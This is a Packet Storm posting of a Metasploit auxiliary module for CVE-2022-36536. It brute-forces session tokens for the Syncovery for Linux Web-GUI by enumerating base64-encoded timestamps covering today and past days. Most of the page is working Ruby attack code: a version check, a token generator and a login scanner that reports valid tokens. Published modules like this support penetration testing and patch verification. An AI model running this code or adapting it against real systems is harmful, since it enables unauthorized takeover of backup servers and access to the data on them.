exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Syncovery For Linux Web-GUI Session Token Brute-Forcer

Syncovery For Linux Web-GUI Session Token Brute-Forcer
Posted Sep 1, 2024
Authored by Jay Turla | Site metasploit.com

This Metasploit module attempts to brute-force a valid session token for the Syncovery File Sync and Backup Software Web-GUI by generating all possible tokens, for every second between DateTime.now and the given X day(s). By default today and yesterday (DAYS = 1) will be checked. If a valid session token is found, the module stops. The vulnerability exists, because in Syncovery session tokens are basically just base64(m/d/Y H:M:S) at the time of the login instead of a random token. If a user does not log out (Syncovery v8.x has no logout) session tokens will remain valid until reboot.

tags | exploit, web
advisories | CVE-2022-36536
SHA-256 | 35774315caca7f89f98bfc845f009123bd6450981504bf93e08596306cfc0432

Syncovery For Linux Web-GUI Session Token Brute-Forcer

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'base64'
require 'date'
require 'json'
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/syncovery_file_sync_backup'

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Syncovery For Linux Web-GUI Session Token Brute-Forcer',
'Description' => %q{
This module attempts to brute-force a valid session token for the Syncovery File Sync & Backup Software Web-GUI
by generating all possible tokens, for every second between 'DateTime.now' and the given X day(s).
By default today and yesterday (DAYS = 1) will be checked. If a valid session token is found, the module stops.
The vulnerability exists, because in Syncovery session tokens are basically just base64(m/d/Y H:M:S) at the time
of the login instead of a random token.
If a user does not log out (Syncovery v8.x has no logout) session tokens will remain valid until reboot.
},
'Author' => [ 'Jan Rude' ],
'References' => [
['URL', 'https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/'],
['CVE', '2022-36536']
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => []
},
'DisclosureDate' => '2022-09-06',
'DefaultOptions' => {
'RPORT' => 8999,
'STOP_ON_SUCCESS' => true # One valid session is enough
}
)
)

register_options(
[
Opt::RPORT(8999), # Default is HTTP: 8999; HTTPS: 8943
OptInt.new('DAYS', [true, 'Check today and last X day(s) for valid session token', 1]),
OptString.new('TARGETURI', [false, 'The path to Syncovery', '/'])
]
)

deregister_options(
'USERNAME', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'DB_SKIP_EXISTING',
'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2',
'REMOVE_USERPASS_FILE', 'REMOVE_USER_FILE', 'DOMAIN', 'HttpUsername', 'BLANK_PASSWORDS', 'USER_FILE',
'USERPASS_FILE', 'PASS_FILE', 'PASSWORD'
)
end

def check_host(_ip)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/get_global_variables'),
'method' => 'GET'
)

if res && res.code == 200
json_res = res.get_json_document
if json_res['isSyncoveryWindows'] == 'false'
version = json_res['SyncoveryTitle']&.scan(/Syncovery\s([A-Za-z0-9.]+)/)&.flatten&.first || ''
if version.empty?
vprint_warning("#{peer} - Could not identify version")
Exploit::CheckCode::Detected
elsif Rex::Version.new(version) < Rex::Version.new('9.48j') || Rex::Version.new(version) == Rex::Version.new('9.48')
vprint_good("#{peer} - Syncovery #{version}")
Exploit::CheckCode::Appears
else
vprint_status("#{peer} - Syncovery #{version}")
Exploit::CheckCode::Safe
end
else
Exploit::CheckCode::Safe
end
else
Exploit::CheckCode::Unknown
end
end

def run_host(ip)
# Calculate dates
days = datastore['DAYS']
if days < 0
days = 0
end
dates = []
(0..days).each do |day|
dates << (Date.today - day).strftime('%m/%d/%Y')
end
time = DateTime.now.strftime('%H:%M:%S')
hrs, min, sec = time.split(':')

# Create possible session tokens
cred_collection = Metasploit::Framework::PrivateCredentialCollection.new
dates.each do |date|
(0..hrs.to_i).reverse_each do |hours|
(0..min.to_i).reverse_each do |minutes|
(0..sec.to_i).reverse_each do |seconds|
timestamp = "#{date} #{format('%.2d', hours)}:#{format('%.2d', minutes)}:#{format('%.2d', seconds)}"
cred_collection.add_private(Base64.strict_encode64(timestamp).strip)
end
sec = 59
end
min = 59
end
hrs = 23
end

print_status("#{peer.strip} - Starting Brute-Forcer")
scanner = Metasploit::Framework::LoginScanner::SyncoveryFileSyncBackup.new(
configure_login_scanner(
host: ip,
port: rport,
cred_details: cred_collection,
stop_on_success: true, # this will have no effect due to the scanner behaviour when scanning without username
connection_timeout: 10
)
)

scanner.scan! do |result|
if result.success?
print_good("#{peer.strip} - VALID TOKEN: #{result.credential.private}")
else
vprint_error("#{peer.strip} - INVALID TOKEN: #{result.credential.private}")
end
end
end
end
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close